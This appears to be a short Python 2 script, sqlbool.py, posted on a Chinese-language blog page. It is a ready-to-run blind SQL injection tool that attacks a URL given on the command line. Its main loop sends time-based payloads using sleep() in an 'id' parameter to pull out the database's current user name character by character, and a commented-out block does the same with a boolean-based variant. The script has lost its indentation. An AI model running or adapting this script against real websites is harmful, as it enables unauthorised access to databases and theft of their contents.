1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
|
#! /usr/bin/env python
# coding=utf-8
#
# Useage:
# python sqlbool.py http://target/a.php
#
import sys
import requests
import time
def attack(url):
print 'attacking'
user = '[+]current_user:'
zimu1 = range(33,65)
zimu2 = range(91,128)
zimu = zimu1 +zimu2
for l in range(1,16):
for i in zimu:
# bool盲注
'''
payload = "and substring(user(),"+str(l)+",1)='" + chr(i) + "'"
payload = {'id':'1 ' + payload}
r = requests.get(url,params=payload)
wenben = r.text
wenben = wenben.encode("utf-8")
result = wenben.find("Dumb")
if (result != -1):
user = user + chr(i)
print user
break
'''
#时间盲注
startTime = time.time()
payload = "and if(mid((select user())," + str(l) + ",1)='"+chr(i)+"',sleep(0.5),1)"
payload = {'id':'1 '+payload}
r = requests.get(url,params=payload)
endTime = time.time()
if (endTime - startTime > 0.5) :
user = user + chr(i)
print l
print user
break
if __name__ == '__main__':
if len(sys.argv)==1:
print u"必须目标"
else:
attack(sys.argv[1])
print '[+]ok'
|
近期评论